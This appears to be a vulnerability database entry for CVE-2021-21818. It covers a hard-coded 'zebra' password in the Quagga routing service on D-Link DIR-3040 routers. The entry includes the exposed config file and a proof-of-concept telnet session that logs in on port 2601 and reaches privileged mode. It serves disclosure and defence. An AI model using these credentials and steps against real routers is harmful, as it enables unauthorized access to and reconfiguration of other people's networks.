logo
DATABASE RESOURCES PRICING ABOUT US

D-LINK DIR-3040 服务组件使用默认密码(CVE-2021-21818)

Description

The DIR-3040 is an AC3000-based wireless internet router. Zebra is an IP routing manager that provides kernel routing table updates, interface lookups, and redistribution of routes between different routing protocols. The DIR-3040 runs this service by default on TCP port 2601 and can be accessed by anyone on the network. This service also uses a configuration file containing a hard-coded password zebra: ``` admin@dlinkrouter:~# cat /tmp/zebra.conf hostname Router password zebra enable password zebra ``` Exploit Proof of Concept ``` $ telnet 192.168.100.1 2601 Trying 192.168.100.1... Connected to 192.168.100.1. Escape character is '^]'. Hello, this is Quagga (version 1.1.1). Copyright 1996-2005 Kunihiro Ishiguro, et al. User Access Verification Password: Router> echo Echo a message back to the vty enable Turn on privileged mode command exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters who Display who is on vty Router> enable Password: Router# clear Clear stored data configure Configuration from vty interface copy Copy configuration debug Debugging functions (see also 'undebug') disable Turn off privileged mode command echo Echo a message back to the vty enable Turn on privileged mode command end End current mode and change to enable mode. exit Exit current mode and down to previous mode help Description of the interactive help system list Print command list logmsg Send a message to enabled logging destinations no Negate a command or set its defaults quit Exit current mode and down to previous mode show Show running system information terminal Set terminal line parameters who Display who is on vty write Write running configuration to memory, network, or terminal ```


Related